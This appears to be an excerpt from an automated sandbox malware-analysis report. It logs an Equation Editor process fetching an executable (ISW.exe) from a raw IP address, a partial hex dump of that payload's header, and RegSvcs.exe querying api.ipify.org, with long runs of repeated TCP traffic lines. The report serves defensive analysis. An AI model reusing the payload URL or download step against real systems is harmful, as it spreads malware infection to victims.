                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 19:48:58 GMTAccept-Ranges: bytesETag: W/"57b5b9c5c99cda1:0"Server: Microsoft-IIS/8.5Date: Thu, 02 May 2024 15:39:45 GMTContent-Length: 1219072Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7d 61 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 ea 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 12 00 00 04 00 00 d4 4e 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 fc 2e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 fc 2e 05 00 00 40 0d 00 00 30 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 70 12 00 00 76 00 00 00 24 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /ISW.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_00EBCE44
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ISW.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: EQNEDT32.EXE, 00000002.00000002.444421814.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.444421814.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.54.101/ISW.exe
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8z
                  Source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
